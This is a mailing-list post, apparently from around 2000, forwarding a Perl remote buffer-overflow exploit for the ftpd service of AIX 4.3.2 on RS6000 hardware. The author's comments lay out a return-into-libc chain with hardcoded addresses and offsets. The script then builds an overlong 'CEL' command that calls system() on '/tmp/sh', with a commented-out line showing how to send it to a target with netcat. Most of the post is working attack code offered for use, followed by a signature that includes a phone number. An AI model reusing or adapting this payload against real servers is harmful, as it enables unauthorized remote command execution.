One of our crewmembers wrote this exploit for the Hack-me project during HIT2000, I searched on securityfocus and saw it was still not mailed over here. IBM has been mailed but due lack of RS6000 knowledge they didn't get it working..... #!/usr/bin/perl # *** Synnergy Networks # * Description: # # Remote bufferoverflow exploit for ftpd from AIX 4.3.2 running on an # RS6000. (power) # This is an return into libc exploit specificly crafted for # one box and it is very unlikely to work on another box # * Author: # # dvorak (dvorak@synnergy.net) # Synnergy Networks (c) 1999, http://www.synnergy.net # * Greets: # # Synnergy Networks, Hit2000 crew, Emphyrio, shevek # * Comments: # # A full working exploit will be released later on. # The addresses point to positions in the program or libraries, # only the relevant instructions are shown also note that b r0 # is in fact something like mfsbr r0, bsbr or what that is in # RS6000 assembly. # # The final call is to system which needs the following arguments: # r3 = address of command to execute # r2 = TOC (what is TOC anyway), I don't know if it does matter but # we set it anyway (we can so why not do it) # r1 = SP but this is ok already, # the rest is free so it seems. # # Our route: # 0x10010150: sets r2 to a place in the buffer and jumps to 0x10015228 # 0x10015228: loads r12 with a value from our buffera # loads r0 with the next address to jump to (0x1001038c) # and sets r2 to another place in our buffer # 0x1001038c: sets r3 to a place in the buffer (finally!) # sets r0 to next address to jump to (0xd00406d4, system(...)) # # The flow with registers is thus: # r2 = 0x14(r1) # r12 = 0x110(r2) # r0 = 0x0(r12) # r2 = 0x4(r12) # r3 = 0x40(r1) # r12 = 0x3c(r2) # 0x14(r1) = r12 this is the plave where TOC is stored but it doesn't seem # to matter # r0 = 0x0(12) # r2 = 0x04(r12) # and of we go... # # We set: # $buf = the buffer on the stack $buf[0] is the first byte in the buffer # but we will count offsets from 4 (the first 4 bytes is just "CEL " is # doesn't matter, only the space does (it makes sure the rest of the buffer) # stays the way it is and isn't converted into lower case # # Offsets: # 0x000: 0x1001038c # 0x004: buf[0] # 0x008: this is the place where the address of the systemcall is taken from # 0xd00406d4 in our case# 0x00c: thi is the address where r2 is loaded # from just before the call to # system(..) we set it to the TOC in our program we don't know if it # matters and if the TOC is constant between hosts # 0x03c: buf[08] # 0x110: buf[0] # 0x204: return address (0x10010150) # 0x210: buf[0] # 0x23c: buf[0x240] # 0x240: "/tmp/sh" or whatever command you want to execute # r1 points to buf[0x1fc] # # I assume the positions in the libraries/program are fixed and that TOC # either doesn't matter or is fixed to please enlighten me on these topics. # # 0x10010150: # l r2, 0x14(r1) # b 0x10015228 # 0x10015228: # l r12, 0x110(r2) # st r12, 0x14(r1) # l r0, 0x0(r12) # l r2, 0x4(r12) # b r0 # 0x1001038c: # l r3, 0x40(r1) # b 0x100136f8 # 0x100136f8: # l r12, 0x3c(r2) # st r12, 0x14(r1) # l r0, 0x0(r12) # l r2, 0x04(r12) # *** Synnergy Networks $bufstart = 0x2ff22724; # this is our first guess $nop = "\xde\xad\xca\xfe"; $buf = "CEL "; $buf .= "\x10\x01\x03\x8c"; # 0 address of second piece of # 'borrowed' code $buf .= pack ("N", $bufstart); # 4 $buf .= "\xd0\x04\x06\xd4"; # 8 system call.. $buf .= "\xf0\x14\x63\x5c"; # c TOC $offset = 0x10; while ($offset < 0x3c) { $offset += 4; $buf .= $nop; } $buf .= pack ("N", $bufstart + 0x008); $offset += 4; while ($offset < 0x110) { $offset += 4; $buf .= $nop; } $buf .= pack ("N", $bufstart); $offset += 4; while ($offset < 0x204) { $offset += 4; $buf .= $nop; } $buf .= "\x10\x01\x01\x50"; $offset += 4; while ($offset < 0x210) { $offset += 4; $buf .= $nop; } $buf .= pack ("N", $bufstart); $offset += 4; while ($offset < 0x23c) { $offset += 4; $buf .= $nop; } $buf .= pack ("N", $bufstart + 0x240); $offset += 4; while ($offset < 0x240) { $offset += 4; $buf .= $nop; } # this is the command that will be run through system $buf .= "/tmp/sh"; $buf .= "\n"; # offcourse you should change this . # open F, "| nc -v -v -n 192.168.2.12 21"; open F, "| od -tx1"; printf F $buf; close F; # EOF gtx, Gerrie Mijn antwoorden & uitspraken zijn geheel voor eigen rekening. tel. 06-24119524 Fun & Secure http://www.hit2000.org Join our RC5 Team!